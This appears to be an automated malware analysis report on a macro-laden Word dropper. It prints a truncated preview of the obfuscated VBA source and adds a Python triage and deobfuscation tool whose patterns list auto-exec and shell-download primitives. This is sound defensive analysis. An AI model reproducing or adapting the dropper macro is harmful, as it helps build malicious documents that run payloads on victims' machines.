Verdict: MALICIOUS
Risk score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. Its AutoOpen macro, which Word runs automatically when the document is opened, calls Shell() to execute a payload; ClamAV independently classifies the file as a dropper (Doc.Dropper.Agent-6348619-0). The VBA source is heavily obfuscated: strings are assembled from Mid/Left/Right slices of junk literals and passed through a decode routine that is not visible in the extracted preview, so the command that reaches Shell() and the origin of the payload cannot be determined from a static read of the source alone.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6348619-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6348619-0.
- VBA macros detected | medium | OLE_VBA_MACROS (3 related findings)
  Document contains VBA macro code.
- Shell() call in VBA | critical | OLE_VBA_SHELL
  Shell() call in VBA.
- AutoOpen macro | high | OLE_VBA_AUTOOPEN
  AutoOpen macro.
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's description assumes no VBA project was recovered, whereas a VBA project was extracted from this sample (macros.bas, below); treat the OLE_VBA_* findings as the primary evidence and this marker as secondary.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that appears in any Office file containing drawing objects; it is not a network indicator and should not be treated as a download or C2 address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10825 bytes |

SHA-256 (macros.bas): dccf1e5a2cf9ee7538e2e38f7a234c099dd3697120e3ebddac029411febb1c9f
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub PPjhodSdk()
AMbbEuM = "1QtPZcqaPkcYRYUBCjLLanjzQwLdrsMHwjGZRPmjPPzcNZ1HM53ALDI41JUUQAAMPA8Q"
MfYhZsNNa = Mid(AMbbEuM, 2, 44)
IScBQjXjtUm = MfYhZsNNa
wXHiYU = "7OX1QVicCBPmiVkjvwdRNjXYVZkSujmtBQOP6WTV3"
BRswv = Mid(wXHiYU, 5, 28)
EYBrsGNkoZM = BRswv
OmbGjMpTYi = "0BIRVE4CUtkMVoftNUvXAiLSRWVVDtwtFRviXLwhvsJJlKOFjOYofiENIPVhLjwbwrGDtBVBWNbQ253E0"
LvqaKzvY = Mid(OmbGjMpTYi, 8, 68)
REdPTwiZfPP = LvqaKzvY
cNEXuNLqRR = "HB14RcvKoHjzbjAoqwUULBS0KY"
KILnidP = Mid(cNEXuNLqRR, 6, 16)
JSXjZrcziP = KILnidP
RQhanJljV = "L8SKmApjEK310GJUJV5LRA30NNKOHJW"
hnRkVGsn = Mid(RQhanJljV, 5, 4)
XDnvwRN = hnRkVGsn
ZZwSGo = "QNEBUBAH2XJTZOMSJDRKMKvqOAwDUrjiwLWJYuMOpoGOkLfFTHWrwFwV81ORHB23"
YmVTju = Mid(ZZwSGo, 22, 34)
PGwURAHOwM = YmVTju
polMRH = "2TS95F5FjEu7REG"
kZzzfICh = Mid(polMRH, 9, 3)
KdmNV = kZzzfICh
iFnLAfas = "UFBBO325TQMBWDTURW8QHOBuiCWXjtOHlIaBEwUhmEjFS3"
pWihVdf = Mid(iFnLAfas, 22, 23)
OLYAa = pWihVdf
iBVnwzzbDjH = "MB4K9ODQ4UPXEHZCjGHPmpVIObNiVIqQWMuiMuDKMitWSRCzoGiOaQ8AFW374G"
BwrXo = Mid(iBVnwzzbDjH, 14, 40)
PUZOnOwcDrl = BwrXo
XjDXUNH = "HYKBGNJ356BNFQNB6C14"
TuIqmkaSzz = Mid(XjDXUNH, 18, 1)
YwGFJt = TuIqmkaSzz
BpQWkml = "TAAQT0AHDvwJFodfqKfMLGqPNqpmDwDEwwqwYJZ31A6B"
fTWRdt = Mid(BpQWkml, 10, 28)
IhDAaBGwq = fTWRdt
hWbaKT = "NZ5LT3AVtVRJSCjcEsrkLhSPWKiKwZMwCkMuhbAFYzBOVjKsiLCrIqVSVaaJmAYTJSHhqmudrlMOOO0NKKR"
AWnpzzNvta = Mid(hWbaKT, 8, 69)
HBQrqm = AWnpzzNvta
rJiAarbZt = "" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + "com" + "ments" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + GDBQWR + SmaNRLBi + TbVkTz + vVwQFia + YGArTYYh
kwiFo = Right(Left((ChVAicZMJ(rJiAarbZt)), 9951), 5)
TGaSfjirck = Mid((ChVAicZMJ(rJiAarbZt)), 11394, 89)
hJMjFvN = Mid((ChVAicZMJ(rJiAarbZt)), 10167, 119)
IciEJd = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 749), 123)
GVJBGtim = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 352), 135)
MRtNjKUJwYO = Mid((ChVAicZMJ(rJiAarbZt)), 9750, 103)
bscKiw = Right(Left((ChVAicZMJ(rJiAarbZt)), 14384), 149)
FlSWOUUa = Right(Left((ChVAicZMJ(rJiAarbZt)), 7570), 76)
zVwARPvvU = Right(Left((ChVAicZMJ(rJiAarbZt)), 6176), 140)
hUKdLhIdiDp = Mid((ChVAicZMJ(rJiAarbZt)), 11245, 108)
HjarRpAj = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 12719), 26)
QGOaaMPjciX = Mid((ChVAicZMJ(rJiAarbZt)), 12976, 15)
HsDnLwh = Right(Left((ChVAicZMJ(rJiAarbZt)), 343), 100)
zUskpD = Mid((ChVAicZMJ(rJiAarbZt)), 9407, 117)
jPAauWwHh = Right(Left((ChVAicZMJ(rJiAarbZt)), 6464), 32)
UNsEjQS = Mid((ChVAicZMJ(rJiAarbZt)), 7429, 22)
ComzTJ = Right(Left((ChVAicZMJ(rJiAarbZt)), 4780), 57)
hqXMFzuIXpN = Mid((ChVAicZMJ(rJiAarbZt)), 1679, 81)
fdfOG = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 14071), 135)
QJUWE = Mid((ChVAicZMJ(rJiAarbZt)), 4984, 119)
ucBHkPDZ = Right(Left((ChVAicZMJ(rJiAarbZt)), 5611), 76)
HOPzvMaEdHW = Mid((ChVAicZMJ(rJiAarbZt)), 939, 28)
kMOAcY = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 9917), 25)
HqVzf = Mid((ChVAicZMJ(rJiAarbZt)), 1803, 139)
cGCGllHrf = Right(Left((ChVAicZMJ(rJiAarbZt)), 8880), 91)
wtRaIGj = Mid((ChVAicZMJ(rJiAarbZt)), 569, 132)
vWObAWt = Mid((ChVAicZMJ(rJiAarbZt)), 11968, 66)
uzQrtcXE = Mid((ChVAicZMJ(rJiAarbZt)), 3715, 91)
VdUjqHcb = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 3500), 40)
hPQKEmGrb = Mid((ChVAicZMJ(rJiAarbZt)), 6922, 121)
sHTlLEE = Mid((ChVAicZMJ(rJiAarbZt)), 7192, 69)
DDqKznamYT = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 6470), 75)
KSqihFnGVjc = Right(Left((ChVAicZMJ(rJiAarbZt)), 14607), 138)
dVBwiD = Mid((ChVAicZMJ(rJiAarbZt)), 10314, 71)
sdiY ... (truncated)
```

Reading notes on the visible portion: the Mid() slices at the top of PPjhodSdk() (IScBQjXjtUm, EYBrsGNkoZM, REdPTwiZfPP, ...) are assigned but never read again in what is shown, so they are padding an analyst can skip. The live data path is rJiAarbZt: a concatenation of variables (jRGPEu, RmVfm, lmdnthw, ...) that are not assigned anywhere in the shown source, with the literal "comments" split into "com" + "ments", fed through the routine ChVAicZMJ() and then cut into many fixed-offset Mid/Left/Right slices. Both ChVAicZMJ() and the assignments that feed rJiAarbZt lie outside the shown portion, so the decoded buffer and the argument eventually passed to Shell() cannot be recovered from this preview alone.
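The AutoOpen and Shell() heuristics above and the string-slicing chains in the preview are the two things an analyst checks first in a dump like this. The following is an added Python example, not part of this report and not oletools code, that does both statically: it flags auto-exec entry points and execution primitives in an olevba-style dump, then evaluates the `name = expr` lines in order, folding Mid/Left/Right/Len slices and `+`/`&` concatenation so the string that reaches Shell() can be read without running the macro. The dump it runs on (SAMPLE) is constructed for the example and is not the sample's real code; the names triage, recover_strings, Parser and tokenize, and the token lists in the regexes, are this example's own. Undeclared variables evaluate to an empty string, which is what VBA does without Option Explicit, and user-defined decode routines such as the ChVAicZMJ() in the preview are reported as unresolved rather than guessed at.

```python
"""Static triage of an olevba-style VBA dump: flag auto-exec entry points and execution
primitives, then fold Mid/Left/Right/Len slicing chains to read the string Shell() receives."""
import re

# Entry points Office runs without user action, and primitives that run or fetch code.
AUTOEXEC = re.compile(r"\b(AutoOpen|AutoExec|AutoNew|AutoClose|Document_Open|Workbook_Open)\b", re.I)
EXEC_PRIMS = re.compile(r"\b(ShellExecute|Shell|CreateObject|WScript\.Shell|URLDownloadToFile)\b", re.I)
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")   # `name = expr` statements only
TOKEN = re.compile(r'"((?:[^"]|"")*)"|(\d+)|([A-Za-z_]\w*)|([()+\-&,])|(\S)')

def triage(src):
    """Lower-cased names of auto-exec macros and execution primitives found in the source."""
    return {"autoexec": sorted({m.group(1).lower() for m in AUTOEXEC.finditer(src)}),
            "exec": sorted({m.group(1).lower() for m in EXEC_PRIMS.finditer(src)})}

def tokenize(text):
    out = []
    for s, n, ident, op, bad in (m.groups() for m in TOKEN.finditer(text)):
        if bad is not None:
            raise ValueError(f"unsupported token {bad!r}")
        out.append(("str", s.replace('""', '"')) if s is not None else          # "" escapes a quote
                   ("num", int(n)) if n is not None else
                   ("id", ident.lower()) if ident is not None else ("op", op))   # names are case-insensitive
    return out

class Parser:
    """Evaluates the expression subset the obfuscator uses: literals, variables,
    the + - & operators, parentheses, and Mid/Left/Right/Len calls."""
    def __init__(self, toks, env, unresolved):
        self.t, self.i, self.env, self.unresolved = toks, 0, env, unresolved

    def peek(self):
        return self.t[self.i] if self.i < len(self.t) else (None, None)

    def expr(self):
        v = self.term()
        while self.peek() in (("op", "+"), ("op", "-"), ("op", "&")):
            op, self.i = self.t[self.i][1], self.i + 1
            r = self.term()
            v = str(v) + str(r) if op == "&" else (v + r if op == "+" else v - r)
        return v

    def term(self):
        k, v = self.peek()
        self.i += 1
        if k in ("str", "num"):
            return v
        if (k, v) == ("op", "("):
            r = self.expr()
            self.i += 1                          # consume ')'
            return r
        if k != "id":
            raise ValueError(f"unexpected token {v!r} at {self.i - 1}")
        if self.peek() != ("op", "("):
            if v not in self.env:                # undeclared Variant reads as "" in VBA
                self.unresolved.add(v)
            return self.env.get(v, "")
        self.i += 1
        args = []
        while self.peek() != ("op", ")"):
            args.append(self.expr())
            if self.peek() == ("op", ","):
                self.i += 1
        self.i += 1
        return self.call(v, args)

    def call(self, name, a):
        s = a[0] if a else ""
        if name == "mid":                        # VBA Mid is 1-based
            return s[a[1] - 1:a[1] - 1 + a[2]]
        if name == "left":
            return s[:a[1]]
        if name == "right":
            return s[max(len(s) - a[1], 0):]
        if name == "len":
            return len(s)
        self.unresolved.add(name + "()")        # user-defined decode routine we do not emulate
        return ""

def recover_strings(src):
    """Evaluate every `name = expr` line in order; returns (variables, unresolved names)."""
    env, unresolved = {}, set()
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if m:                                    # skips Sub/End Sub/Attribute/call statements
            p = Parser(tokenize(m.group(2)), env, unresolved)
            env[m.group(1).lower()] = p.expr()
            if p.i != len(p.t):
                raise ValueError(f"trailing tokens in: {line.strip()}")
    return env, unresolved

# Constructed dump in the shape of the preview above; not the sample's real code.
SAMPLE = '''Attribute VB_Name = "Module1"
Sub AutoOpen()
    vA = "zzcmd /czz"
    vB = Mid(vA, 3, 6)
    vC = "ab c"
    vD = Right(Left(vC, 3), 1)
    vE = "whoamiXYZ"
    vF = Left(vE, Len(vE) - 3)
    cmd = "" + vB + vD + vF + notDefinedAnywhere
    Shell cmd, vbHide
End Sub'''

if __name__ == "__main__":
    print(triage(SAMPLE), recover_strings(SAMPLE))
```

Run it directly to see the triage dictionary, the recovered variable table (cmd resolves to `cmd /c whoami`) and the unresolved-name set. On the real macros.bas the unresolved set would list the variables feeding rJiAarbZt and `chvaiczmj()`, which is exactly the list of things that still have to be obtained from the full extraction or from a sandbox run; adding the decode routine's logic to `call()` once it is known is the natural next step.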